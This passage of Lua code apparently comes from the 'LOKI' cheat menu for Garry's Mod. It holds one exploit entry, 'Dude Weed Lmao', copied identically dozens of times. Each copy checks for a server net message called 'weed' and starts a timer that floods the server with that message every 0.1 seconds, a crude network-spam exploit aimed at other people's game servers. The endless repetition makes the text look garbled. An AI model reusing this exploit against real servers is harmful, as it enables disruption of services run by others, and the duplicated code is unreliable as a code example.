  1896. net.WriteString( "DUDE" )
  1897. net.SendToServer()
  1898. end)
  1899. else
  1900. timer.Remove( "loki_bonghit" )
  1901. end
  1902. end, },
  1903. },
  1904. } )
  1905.  
  1906. LOKI.AddExploit( "Dude Weed Lmao", {
  1907. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  1908. severity = 1,
  1909. scan = function() return LOKI.ValidNetString( "weed" ) end,
  1910. functions = {
  1911. { typ = "func", name = "Big Weed", func = function()
  1912. if !timer.Exists( "loki_bonghit" ) then
  1913. timer.Create( "loki_bonghit", 0.1, 0, function()
  1914. net.Start( "weed" )
  1915. net.WriteString( "DUDE" )
  1916. net.SendToServer()
  1917. end)
  1918. else
  1919. timer.Remove( "loki_bonghit" )
  1920. end
  1921. end, },
  1922. },
  1923. } )
  1924.  
  1925. LOKI.AddExploit( "Dude Weed Lmao", {
  1926. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  1927. severity = 1,
  1928. scan = function() return LOKI.ValidNetString( "weed" ) end,
  1929. functions = {
  1930. { typ = "func", name = "Big Weed", func = function()
  1931. if !timer.Exists( "loki_bonghit" ) then
  1932. timer.Create( "loki_bonghit", 0.1, 0, function()
  1933. net.Start( "weed" )
  1934. net.WriteString( "DUDE" )
  1935. net.SendToServer()
  1936. end)
  1937. else
  1938. timer.Remove( "loki_bonghit" )
  1939. end
  1940. end, },
  1941. },
  1942. } )
  1943.  
  1944. LOKI.AddExploit( "Dude Weed Lmao", {
  1945. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  1946. severity = 1,
  1947. scan = function() return LOKI.ValidNetString( "weed" ) end,
  1948. functions = {
  1949. { typ = "func", name = "Big Weed", func = function()
  1950. if !timer.Exists( "loki_bonghit" ) then
  1951. timer.Create( "loki_bonghit", 0.1, 0, function()
  1952. net.Start( "weed" )
  1953. net.WriteString( "DUDE" )
  1954. net.SendToServer()
  1955. end)
  1956. else
  1957. timer.Remove( "loki_bonghit" )
  1958. end
  1959. end, },
  1960. },
  1961. } )
  1962.  
  1963. LOKI.AddExploit( "Dude Weed Lmao", {
  1964. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  1965. severity = 1,
  1966. scan = function() return LOKI.ValidNetString( "weed" ) end,
  1967. functions = {
  1968. { typ = "func", name = "Big Weed", func = function()
  1969. if !timer.Exists( "loki_bonghit" ) then
  1970. timer.Create( "loki_bonghit", 0.1, 0, function()
  1971. net.Start( "weed" )
  1972. net.WriteString( "DUDE" )
  1973. net.SendToServer()
  1974. end)
  1975. else
  1976. timer.Remove( "loki_bonghit" )
  1977. end
  1978. end, },
  1979. },
  1980. } )
  1981.  
  1982. LOKI.AddExploit( "Dude Weed Lmao", {
  1983. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  1984. severity = 1,
  1985. scan = function() return LOKI.ValidNetString( "weed" ) end,
  1986. functions = {
  1987. { typ = "func", name = "Big Weed", func = function()
  1988. if !timer.Exists( "loki_bonghit" ) then
  1989. timer.Create( "loki_bonghit", 0.1, 0, function()
  1990. net.Start( "weed" )
  1991. net.WriteString( "DUDE" )
  1992. net.SendToServer()
  1993. end)
  1994. else
  1995. timer.Remove( "loki_bonghit" )
  1996. end
  1997. end, },
  1998. },
  1999. } )
  2000.  
  2001. LOKI.AddExploit( "Dude Weed Lmao", {
  2002. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  2003. severity = 1,
  2004. scan = function() return LOKI.ValidNetString( "weed" ) end,
  2005. functions = {
  2006. { typ = "func", name = "Big Weed", func = function()
  2007. if !timer.Exists( "loki_bonghit" ) then
  2008. timer.Create( "loki_bonghit", 0.1, 0, function()
  2009. net.Start( "weed" )
  2010. net.WriteString( "DUDE" )
  2011. net.SendToServer()
  2012. end)
  2013. else
  2014. timer.Remove( "loki_bonghit" )
  2015. end
  2016. end, },
  2017. },
  2018. } )
  2019.  
  2020. LOKI.AddExploit( "Dude Weed Lmao", {
  2021. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  2022. severity = 1,
  2023. scan = function() return LOKI.ValidNetString( "weed" ) end,
  2024. functions = {
  2025. { typ = "func", name = "Big Weed", func = function()
  2026. if !timer.Exists( "loki_bonghit" ) then
  2027. timer.Create( "loki_bonghit", 0.1, 0, function()
  2028. net.Start( "weed" )
  2029. net.WriteString( "DUDE" )
  2030. net.SendToServer()
  2031. end)
  2032. else
  2033. timer.Remove( "loki_bonghit" )
  2034. end
  2035. end, },
  2036. },
  2037. } )
  2038.  
  2039. LOKI.AddExploit( "Dude Weed Lmao", {
  2040. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  2041. severity = 1,
  2042. scan = function() return LOKI.ValidNetString( "weed" ) end,
  2043. functions = {
  2044. { typ = "func", name = "Big Weed", func = function()
  2045. if !timer.Exists( "loki_bonghit" ) then
  2046. timer.Create( "loki_bonghit", 0.1, 0, function()
  2047. net.Start( "weed" )
  2048. net.WriteString( "DUDE" )
  2049. net.SendToServer()
  2050. end)
  2051. else
  2052. timer.Remove( "loki_bonghit" )
  2053. end
  2054. end, },
  2055. },
  2056. } )
  2057.  
  2058. LOKI.AddExploit( "Dude Weed Lmao", {
  2059. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  2060. severity = 1,
  2061. scan = function() return LOKI.ValidNetString( "weed" ) end,
  2062. functions = {
  2063. { typ = "func", name = "Big Weed", func = function()
  2064. if !timer.Exists( "loki_bonghit" ) then
  2065. timer.Create( "loki_bonghit", 0.1, 0, function()
  2066. net.Start( "weed" )
  2067. net.WriteString( "DUDE" )
  2068. net.SendToServer()
  2069. end)
  2070. else
  2071. timer.Remove( "loki_bonghit" )
  2072. end
  2073. end, },
  2074. },
  2075. } )
  2076.  
  2077. LOKI.AddExploit( "Dude Weed Lmao", {
  2078. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  2079. severity = 1,
  2080. scan = function() return LOKI.ValidNetString( "weed" ) end,
  2081. functions = {
  2082. { typ = "func", name = "Big Weed", func = function()
  2083. if !timer.Exists( "loki_bonghit" ) then
  2084. timer.Create( "loki_bonghit", 0.1, 0, function()
  2085. net.Start( "weed" )
  2086. net.WriteString( "DUDE" )
  2087. net.SendToServer()
  2088. end)
  2089. else
  2090. timer.Remove( "loki_bonghit" )
  2091. end
  2092. end, },
  2093. },
  2094. } )
  2095.  
  2096. LOKI.AddExploit( "Dude Weed Lmao", {
  2097. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  2098. severity = 1,
  2099. scan = function() return LOKI.ValidNetString( "weed" ) end,
  2100. functions = {
  2101. { typ = "func", name = "Big Weed", func = function()
  2102. if !timer.Exists( "loki_bonghit" ) then
  2103. timer.Create( "loki_bonghit", 0.1, 0, function()
  2104. net.Start( "weed" )
  2105. net.WriteString( "DUDE" )
  2106. net.SendToServer()
  2107. end)
  2108. else
  2109. timer.Remove( "loki_bonghit" )
  2110. end
  2111. end, },
  2112. },
  2113. } )
  2114.  
  2115. LOKI.AddExploit( "Dude Weed Lmao", {
  2116. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  2117. severity = 1,
  2118. scan = function() return LOKI.ValidNetString( "weed" ) end,
  2119. functions = {
  2120. { typ = "func", name = "Big Weed", func = function()
  2121. if !timer.Exists( "loki_bonghit" ) then
  2122. timer.Create( "loki_bonghit", 0.1, 0, function()
  2123. net.Start( "weed" )
  2124. net.WriteString( "DUDE" )
  2125. net.SendToServer()
  2126. end)
  2127. else
  2128. timer.Remove( "loki_bonghit" )
  2129. end
  2130. end, },
  2131. },
  2132. } )
  2133.  
  2134. LOKI.AddExploit( "Dude Weed Lmao", {
  2135. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  2136. severity = 1,
  2137. scan = function() return LOKI.ValidNetString( "weed" ) end,
  2138. functions = {
  2139. { typ = "func", name = "Big Weed", func = function()
  2140. if !timer.Exists( "loki_bonghit" ) then
  2141. timer.Create( "loki_bonghit", 0.1, 0, function()
  2142. net.Start( "weed" )
  2143. net.WriteString( "DUDE" )
  2144. net.SendToServer()
  2145. end)
  2146. else
  2147. timer.Remove( "loki_bonghit" )
  2148. end
  2149. end, },
  2150. },
  2151. } )
  2152.  
  2153. LOKI.AddExploit( "Dude Weed Lmao", {
  2154. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  2155. severity = 1,
  2156. scan = function() return LOKI.ValidNetString( "weed" ) end,
  2157. functions = {
  2158. { typ = "func", name = "Big Weed", func = function()
  2159. if !timer.Exists( "loki_bonghit" ) then
  2160. timer.Create( "loki_bonghit", 0.1, 0, function()
  2161. net.Start( "weed" )
  2162. net.WriteString( "DUDE" )
  2163. net.SendToServer()
  2164. end)
  2165. else
  2166. timer.Remove( "loki_bonghit" )
  2167. end
  2168. end, },
  2169. },
  2170. } )
  2171.  
  2172. LOKI.AddExploit( "Dude Weed Lmao", {
  2173. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  2174. severity = 1,
  2175. scan = function() return LOKI.ValidNetString( "weed" ) end,
  2176. functions = {
  2177. { typ = "func", name = "Big Weed", func = function()
  2178. if !timer.Exists( "loki_bonghit" ) then
  2179. timer.Create( "loki_bonghit", 0.1, 0, function()
  2180. net.Start( "weed" )
  2181. net.WriteString( "DUDE" )
  2182. net.SendToServer()
  2183. end)
  2184. else
  2185. timer.Remove( "loki_bonghit" )
  2186. end
  2187. end, },
  2188. },
  2189. } )
  2190.  
  2191. LOKI.AddExploit( "Dude Weed Lmao", {
  2192. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  2193. severity = 1,
  2194. scan = function() return LOKI.ValidNetString( "weed" ) end,
  2195. functions = {
  2196. { typ = "func", name = "Big Weed", func = function()
  2197. if !timer.Exists( "loki_bonghit" ) then
  2198. timer.Create( "loki_bonghit", 0.1, 0, function()
  2199. net.Start( "weed" )
  2200. net.WriteString( "DUDE" )
  2201. net.SendToServer()
  2202. end)
  2203. else
  2204. timer.Remove( "loki_bonghit" )
  2205. end
  2206. end, },
  2207. },
  2208. } )
  2209.  
  2210. LOKI.AddExploit( "Dude Weed Lmao", {
  2211. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  2212. severity = 1,
  2213. scan = function() return LOKI.ValidNetString( "weed" ) end,
  2214. functions = {
  2215. { typ = "func", name = "Big Weed", func = function()
  2216. if !timer.Exists( "loki_bonghit" ) then
  2217. timer.Create( "loki_bonghit", 0.1, 0, function()
  2218. net.Start( "weed" )
  2219. net.WriteString( "DUDE" )
  2220. net.SendToServer()
  2221. end)
  2222. else
  2223. timer.Remove( "loki_bonghit" )
  2224. end
  2225. end, },
  2226. },
  2227. } )
  2228.  
  2229. LOKI.AddExploit( "Dude Weed Lmao", {
  2230. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  2231. severity = 1,
  2232. scan = function() return LOKI.ValidNetString( "weed" ) end,
  2233. functions = {
  2234. { typ = "func", name = "Big Weed", func = function()
  2235. if !timer.Exists( "loki_bonghit" ) then
  2236. timer.Create( "loki_bonghit", 0.1, 0, function()
  2237. net.Start( "weed" )
  2238. net.WriteString( "DUDE" )
  2239. net.SendToServer()
  2240. end)
  2241. else
  2242. timer.Remove( "loki_bonghit" )
  2243. end
  2244. end, },
  2245. },
  2246. } )
  2247.  
  2248. LOKI.AddExploit( "Dude Weed Lmao", {
  2249. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  2250. severity = 1,
  2251. scan = function() return LOKI.ValidNetString( "weed" ) end,
  2252. functions = {
  2253. { typ = "func", name = "Big Weed", func = function()
  2254. if !timer.Exists( "loki_bonghit" ) then
  2255. timer.Create( "loki_bonghit", 0.1, 0, function()
  2256. net.Start( "weed" )
  2257. net.WriteString( "DUDE" )
  2258. net.SendToServer()
  2259. end)
  2260. else
  2261. timer.Remove( "loki_bonghit" )
  2262. end
  2263. end, },
  2264. },
  2265. } )
  2266.  
  2267. LOKI.AddExploit( "Dude Weed Lmao", {
  2268. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  2269. severity = 1,
  2270. scan = function() return LOKI.ValidNetString( "weed" ) end,
  2271. functions = {
  2272. { typ = "func", name = "Big Weed", func = function()
  2273. if !timer.Exists( "loki_bonghit" ) then
  2274. timer.Create( "loki_bonghit", 0.1, 0, function()
  2275. net.Start( "weed" )
  2276. net.WriteString( "DUDE" )
  2277. net.SendToServer()
  2278. end)
  2279. else
  2280. timer.Remove( "loki_bonghit" )
  2281. end
  2282. end, },
  2283. },
  2284. } )
  2285.  
  2286. LOKI.AddExploit( "Dude Weed Lmao", {
  2287. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  2288. severity = 1,
  2289. scan = function() return LOKI.ValidNetString( "weed" ) end,
  2290. functions = {
  2291. { typ = "func", name = "Big Weed", func = function()
  2292. if !timer.Exists( "loki_bonghit" ) then
  2293. timer.Create( "loki_bonghit", 0.1, 0, function()
  2294. net.Start( "weed" )
  2295. net.WriteString( "DUDE" )
  2296. net.SendToServer()
  2297. end)
  2298. else
  2299. timer.Remove( "loki_bonghit" )
  2300. end
  2301. end, },
  2302. },
  2303. } )
  2304.  
  2305. LOKI.AddExploit( "Dude Weed Lmao", {
  2306. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  2307. severity = 1,
  2308. scan = function() return LOKI.ValidNetString( "weed" ) end,
  2309. functions = {
  2310. { typ = "func", name = "Big Weed", func = function()
  2311. if !timer.Exists( "loki_bonghit" ) then
  2312. timer.Create( "loki_bonghit", 0.1, 0, function()
  2313. net.Start( "weed" )
  2314. net.WriteString( "DUDE" )
  2315. net.SendToServer()
  2316. end)
  2317. else
  2318. timer.Remove( "loki_bonghit" )
  2319. end
  2320. end, },
  2321. },
  2322. } )
  2323.  
  2324. LOKI.AddExploit( "Dude Weed Lmao", {
  2325. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  2326. severity = 1,
  2327. scan = function() return LOKI.ValidNetString( "weed" ) end,
  2328. functions = {
  2329. { typ = "func", name = "Big Weed", func = function()
  2330. if !timer.Exists( "loki_bonghit" ) then
  2331. timer.Create( "loki_bonghit", 0.1, 0, function()
  2332. net.Start( "weed" )
  2333. net.WriteString( "DUDE" )
  2334. net.SendToServer()
  2335. end)
  2336. else
  2337. timer.Remove( "loki_bonghit" )
  2338. end
  2339. end, },
  2340. },
  2341. } )
  2342.  
  2343. LOKI.AddExploit( "Dude Weed Lmao", {
  2344. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  2345. severity = 1,
  2346. scan = function() return LOKI.ValidNetString( "weed" ) end,
  2347. functions = {
  2348. { typ = "func", name = "Big Weed", func = function()
  2349. if !timer.Exists( "loki_bonghit" ) then
  2350. timer.Create( "loki_bonghit", 0.1, 0, function()
  2351. net.Start( "weed" )
  2352. net.WriteString( "DUDE" )
  2353. net.SendToServer()
  2354. end)
  2355. else
  2356. timer.Remove( "loki_bonghit" )
  2357. end
  2358. end, },
  2359. },
  2360. } )
  2361.  
  2362. LOKI.AddExploit( "Dude Weed Lmao", {
  2363. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  2364. severity = 1,
  2365. scan = function() return LOKI.ValidNetString( "weed" ) end,
  2366. functions = {
  2367. { typ = "func", name = "Big Weed", func = function()
  2368. if !timer.Exists( "loki_bonghit" ) then
  2369. timer.Create( "loki_bonghit", 0.1, 0, function()
  2370. net.Start( "weed" )
  2371. net.WriteString( "DUDE" )
  2372. net.SendToServer()
  2373. end)
  2374. else
  2375. timer.Remove( "loki_bonghit" )
  2376. end
  2377. end, },
  2378. },
  2379. } )
  2380.  
  2381. LOKI.AddExploit( "Dude Weed Lmao", {
  2382. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  2383. severity = 1,
  2384. scan = function() return LOKI.ValidNetString( "weed" ) end,
  2385. functions = {
  2386. { typ = "func", name = "Big Weed", func = function()
  2387. if !timer.Exists( "loki_bonghit" ) then
  2388. timer.Create( "loki_bonghit", 0.1, 0, function()
  2389. net.Start( "weed" )
  2390. net.WriteString( "DUDE" )
  2391. net.SendToServer()
  2392. end)
  2393. else
  2394. timer.Remove( "loki_bonghit" )
  2395. end
  2396. end, },
  2397. },
  2398. } )
  2399.  
  2400. LOKI.AddExploit( "Dude Weed Lmao", {
  2401. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  2402. severity = 1,
  2403. scan = function() return LOKI.ValidNetString( "weed" ) end,
  2404. functions = {
  2405. { typ = "func", name = "Big Weed", func = function()
  2406. if !timer.Exists( "loki_bonghit" ) then
  2407. timer.Create( "loki_bonghit", 0.1, 0, function()
  2408. net.Start( "weed" )
  2409. net.WriteString( "DUDE" )
  2410. net.SendToServer()
  2411. end)
  2412. else
  2413. timer.Remove( "loki_bonghit" )
  2414. end
  2415. end, },
  2416. },
  2417. } )
  2418.  
  2419. LOKI.AddExploit( "Dude Weed Lmao", {
  2420. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  2421. severity = 1,
  2422. scan = function() return LOKI.ValidNetString( "weed" ) end,
  2423. functions = {
  2424. { typ = "func", name = "Big Weed", func = function()
  2425. if !timer.Exists( "loki_bonghit" ) then
  2426. timer.Create( "loki_bonghit", 0.1, 0, function()
  2427. net.Start( "weed" )
  2428. net.WriteString( "DUDE" )
  2429. net.SendToServer()
  2430. end)
  2431. else
  2432. timer.Remove( "loki_bonghit" )
  2433. end
  2434. end, },
  2435. },
  2436. } )
  2437.  
  2438. LOKI.AddExploit( "Dude Weed Lmao", {
  2439. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  2440. severity = 1,
  2441. scan = function() return LOKI.ValidNetString( "weed" ) end,
  2442. functions = {
  2443. { typ = "func", name = "Big Weed", func = function()
  2444. if !timer.Exists( "loki_bonghit" ) then
  2445. timer.Create( "loki_bonghit", 0.1, 0, function()
  2446. net.Start( "weed" )
  2447. net.WriteString( "DUDE" )
  2448. net.SendToServer()
  2449. end)
  2450. else
  2451. timer.Remove( "loki_bonghit" )
  2452. end
  2453. end, },
  2454. },
  2455. } )
  2456.  
  2457. LOKI.AddExploit( "Dude Weed Lmao", {
  2458. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  2459. severity = 1,
  2460. scan = function() return LOKI.ValidNetString( "weed" ) end,
  2461. functions = {
  2462. { typ = "func", name = "Big Weed", func = function()
  2463. if !timer.Exists( "loki_bonghit" ) then
  2464. timer.Create( "loki_bonghit", 0.1, 0, function()
  2465. net.Start( "weed" )
  2466. net.WriteString( "DUDE" )
  2467. net.SendToServer()
  2468. end)
  2469. else
  2470. timer.Remove( "loki_bonghit" )
  2471. end
  2472. end, },
  2473. },
  2474. } )
  2475.  
  2476. LOKI.AddExploit( "Dude Weed Lmao", {
  2477. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  2478. severity = 1,
  2479. scan = function() return LOKI.ValidNetString( "weed" ) end,
  2480. functions = {
  2481. { typ = "func", name = "Big Weed", func = function()
  2482. if !timer.Exists( "loki_bonghit" ) then
  2483. timer.Create( "loki_bonghit", 0.1, 0, function()
  2484. net.Start( "weed" )
  2485. net.WriteString( "DUDE" )
  2486. net.SendToServer()
  2487. end)
  2488. else
  2489. timer.Remove( "loki_bonghit" )
  2490. end
  2491. end, },
  2492. },
  2493. } )
  2494.  
  2495. LOKI.AddExploit( "Dude Weed Lmao", {
  2496. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  2497. severity = 1,
  2498. scan = function() return LOKI.ValidNetString( "weed" ) end,
  2499. functions = {
  2500. { typ = "func", name = "Big Weed", func = function()
  2501. if !timer.Exists( "loki_bonghit" ) then
  2502. timer.Create( "loki_bonghit", 0.1, 0, function()
  2503. net.Start( "weed" )
  2504. net.WriteString( "DUDE" )
  2505. net.SendToServer()
  2506. end)
  2507. else
  2508. timer.Remove( "loki_bonghit" )
  2509. end
  2510. end, },
  2511. },
  2512. } )
  2513.  
  2514. LOKI.AddExploit( "Dude Weed Lmao", {
  2515. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  2516. severity = 1,
  2517. scan = function() return LOKI.ValidNetString( "weed" ) end,
  2518. functions = {
  2519. { typ = "func", name = "Big Weed", func = function()
  2520. if !timer.Exists( "loki_bonghit" ) then
  2521. timer.Create( "loki_bonghit", 0.1, 0, function()
  2522. net.Start( "weed" )
  2523. net.WriteString( "DUDE" )
  2524. net.SendToServer()
  2525. end)
  2526. else
  2527. timer.Remove( "loki_bonghit" )
  2528. end
  2529. end, },
  2530. },
  2531. } )
  2532.  
  2533. LOKI.AddExploit( "Dude Weed Lmao", {
  2534. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  2535. severity = 1,
  2536. scan = function() return LOKI.ValidNetString( "weed" ) end,
  2537. functions = {
  2538. { typ = "func", name = "Big Weed", func = function()
  2539. if !timer.Exists( "loki_bonghit" ) then
  2540. timer.Create( "loki_bonghit", 0.1, 0, function()
  2541. net.Start( "weed" )
  2542. net.WriteString( "DUDE" )
  2543. net.SendToServer()
  2544. end)
  2545. else
  2546. timer.Remove( "loki_bonghit" )
  2547. end
  2548. end, },
  2549. },
  2550. } )
  2551.  
  2552. LOKI.AddExploit( "Dude Weed Lmao", {
  2553. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  2554. severity = 1,
  2555. scan = function() return LOKI.ValidNetString( "weed" ) end,
  2556. functions = {
  2557. { typ = "func", name = "Big Weed", func = function()
  2558. if !timer.Exists( "loki_bonghit" ) then
  2559. timer.Create( "loki_bonghit", 0.1, 0, function()
  2560. net.Start( "weed" )
  2561. net.WriteString( "DUDE" )
  2562. net.SendToServer()
  2563. end)
  2564. else
  2565. timer.Remove( "loki_bonghit" )
  2566. end
  2567. end, },
  2568. },
  2569. } )
  2570.  
  2571. LOKI.AddExploit( "Dude Weed Lmao", {
  2572. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  2573. severity = 1,
  2574. scan = function() return LOKI.ValidNetString( "weed" ) end,
  2575. functions = {
  2576. { typ = "func", name = "Big Weed", func = function()
  2577. if !timer.Exists( "loki_bonghit" ) then
  2578. timer.Create( "loki_bonghit", 0.1, 0, function()
  2579. net.Start( "weed" )
  2580. net.WriteString( "DUDE" )
  2581. net.SendToServer()
  2582. end)
  2583. else
  2584. timer.Remove( "loki_bonghit" )
  2585. end
  2586. end, },
  2587. },
  2588. } )
  2589.  
  2590. LOKI.AddExploit( "Dude Weed Lmao", {
  2591. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  2592. severity = 1,
  2593. scan = function() return LOKI.ValidNetString( "weed" ) end,
  2594. functions = {
  2595. { typ = "func", name = "Big Weed", func = function()
  2596. if !timer.Exists( "loki_bonghit" ) then
  2597. timer.Create( "loki_bonghit", 0.1, 0, function()
  2598. net.Start( "weed" )
  2599. net.WriteString( "DUDE" )
  2600. net.SendToServer()
  2601. end)
  2602. else
  2603. timer.Remove( "loki_bonghit" )
  2604. end
  2605. end, },
  2606. },
  2607. } )
  2608.  
  2609. LOKI.AddExploit( "Dude Weed Lmao", {
  2610. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  2611. severity = 1,
  2612. scan = function() return LOKI.ValidNetString( "weed" ) end,
  2613. functions = {
  2614. { typ = "func", name = "Big Weed", func = function()
  2615. if !timer.Exists( "loki_bonghit" ) then
  2616. timer.Create( "loki_bonghit", 0.1, 0, function()
  2617. net.Start( "weed" )
  2618. net.WriteString( "DUDE" )
  2619. net.SendToServer()
  2620. end)
  2621. else
  2622. timer.Remove( "loki_bonghit" )
  2623. end
  2624. end, },
  2625. },
  2626. } )
  2627.  
  2628. LOKI.AddExploit( "Dude Weed Lmao", {
  2629. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  2630. severity = 1,
  2631. scan = function() return LOKI.ValidNetString( "weed" ) end,
  2632. functions = {
  2633. { typ = "func", name = "Big Weed", func = function()
  2634. if !timer.Exists( "loki_bonghit" ) then
  2635. timer.Create( "loki_bonghit", 0.1, 0, function()
  2636. net.Start( "weed" )
  2637. net.WriteString( "DUDE" )
  2638. net.SendToServer()
  2639. end)
  2640. else
  2641. timer.Remove( "loki_bonghit" )
  2642. end
  2643. end, },
  2644. },
  2645. } )
  2646.  
  2647. LOKI.AddExploit( "Dude Weed Lmao", {
  2648. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  2649. severity = 1,
  2650. scan = function() return LOKI.ValidNetString( "weed" ) end,
  2651. functions = {
  2652. { typ = "func", name = "Big Weed", func = function()
  2653. if !timer.Exists( "loki_bonghit" ) then
  2654. timer.Create( "loki_bonghit", 0.1, 0, function()
  2655. net.Start( "weed" )
  2656. net.WriteString( "DUDE" )
  2657. net.SendToServer()
  2658. end)
  2659. else
  2660. timer.Remove( "loki_bonghit" )
  2661. end
  2662. end, },
  2663. },
  2664. } )
  2665.  
  2666. LOKI.AddExploit( "Dude Weed Lmao", {
  2667. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  2668. severity = 1,
  2669. scan = function() return LOKI.ValidNetString( "weed" ) end,
  2670. functions = {
  2671. { typ = "func", name = "Big Weed", func = function()
  2672. if !timer.Exists( "loki_bonghit" ) then
  2673. timer.Create( "loki_bonghit", 0.1, 0, function()
  2674. net.Start( "weed" )
  2675. net.WriteString( "DUDE" )
  2676. net.SendToServer()
  2677. end)
  2678. else
  2679. timer.Remove( "loki_bonghit" )
  2680. end
  2681. end, },
  2682. },
  2683. } )
  2684.  
  2685. LOKI.AddExploit( "Dude Weed Lmao", {
  2686. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  2687. severity = 1,
  2688. scan = function() return LOKI.ValidNetString( "weed" ) end,
  2689. functions = {
  2690. { typ = "func", name = "Big Weed", func = function()
  2691. if !timer.Exists( "loki_bonghit" ) then
  2692. timer.Create( "loki_bonghit", 0.1, 0, function()
  2693. net.Start( "weed" )
  2694. net.WriteString( "DUDE" )
  2695. net.SendToServer()
  2696. end)
  2697. else
  2698. timer.Remove( "loki_bonghit" )
  2699. end
  2700. end, },
  2701. },
  2702. } )
  2703.  
  2704. LOKI.AddExploit( "Dude Weed Lmao", {
  2705. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  2706. severity = 1,
  2707. scan = function() return LOKI.ValidNetString( "weed" ) end,
  2708. functions = {
  2709. { typ = "func", name = "Big Weed", func = function()
  2710. if !timer.Exists( "loki_bonghit" ) then
  2711. timer.Create( "loki_bonghit", 0.1, 0, function()
  2712. net.Start( "weed" )
  2713. net.WriteString( "DUDE" )
  2714. net.SendToServer()
  2715. end)
  2716. else
  2717. timer.Remove( "loki_bonghit" )
  2718. end
  2719. end, },
  2720. },
  2721. } )
  2722.  
  2723. LOKI.AddExploit( "Dude Weed Lmao", {
  2724. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  2725. severity = 1,
  2726. scan = function() return LOKI.ValidNetString( "weed" ) end,
  2727. functions = {
  2728. { typ = "func", name = "Big Weed", func = function()
  2729. if !timer.Exists( "loki_bonghit" ) then
  2730. timer.Create( "loki_bonghit", 0.1, 0, function()
  2731. net.Start( "weed" )
  2732. net.WriteString( "DUDE" )
  2733. net.SendToServer()
  2734. end)
  2735. else
  2736. timer.Remove( "loki_bonghit" )
  2737. end
  2738. end, },
  2739. },
  2740. } )
  2741.  
  2742. LOKI.AddExploit( "Dude Weed Lmao", {
  2743. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  2744. severity = 1,
  2745. scan = function() return LOKI.ValidNetString( "weed" ) end,
  2746. functions = {
  2747. { typ = "func", name = "Big Weed", func = function()
  2748. if !timer.Exists( "loki_bonghit" ) then
  2749. timer.Create( "loki_bonghit", 0.1, 0, function()
  2750. net.Start( "weed" )
  2751. net.WriteString( "DUDE" )
  2752. net.SendToServer()
  2753. end)
  2754. else
  2755. timer.Remove( "loki_bonghit" )
  2756. end
  2757. end, },
  2758. },
  2759. } )
  2760.  
  2761. LOKI.AddExploit( "Dude Weed Lmao", {
  2762. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  2763. severity = 1,
  2764. scan = function() return LOKI.ValidNetString( "weed" ) end,
  2765. functions = {
  2766. { typ = "func", name = "Big Weed", func = function()
  2767. if !timer.Exists( "loki_bonghit" ) then
  2768. timer.Create( "loki_bonghit", 0.1, 0, function()
  2769. net.Start( "weed" )
  2770. net.WriteString( "DUDE" )
  2771. net.SendToServer()
  2772. end)
  2773. else
  2774. timer.Remove( "loki_bonghit" )
  2775. end
  2776. end, },
  2777. },
  2778. } )
  2779.  
  2780. LOKI.AddExploit( "Dude Weed Lmao", {
  2781. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  2782. severity = 1,
  2783. scan = function() return LOKI.ValidNetString( "weed" ) end,
  2784. functions = {
  2785. { typ = "func", name = "Big Weed", func = function()
  2786. if !timer.Exists( "loki_bonghit" ) then
  2787. timer.Create( "loki_bonghit", 0.1, 0, function()
  2788. net.Start( "weed" )
  2789. net.WriteString( "DUDE" )
  2790. net.SendToServer()
  2791. end)
  2792. else
  2793. timer.Remove( "loki_bonghit" )
  2794. end
  2795. end, },
  2796. },
  2797. } )
  2798.  
  2799. LOKI.AddExploit( "Dude Weed Lmao", {
  2800. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  2801. severity = 1,
  2802. scan = function() return LOKI.ValidNetString( "weed" ) end,
  2803. functions = {
  2804. { typ = "func", name = "Big Weed", func = function()
  2805. if !timer.Exists( "loki_bonghit" ) then
  2806. timer.Create( "loki_bonghit", 0.1, 0, function()
  2807. net.Start( "weed" )
  2808. net.WriteString( "DUDE" )
  2809. net.SendToServer()
  2810. end)
  2811. else
  2812. timer.Remove( "loki_bonghit" )
  2813. end
  2814. end, },
  2815. },
  2816. } )
  2817.  
  2818. LOKI.AddExploit( "Dude Weed Lmao", {
  2819. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  2820. severity = 1,
  2821. scan = function() return LOKI.ValidNetString( "weed" ) end,
  2822. functions = {
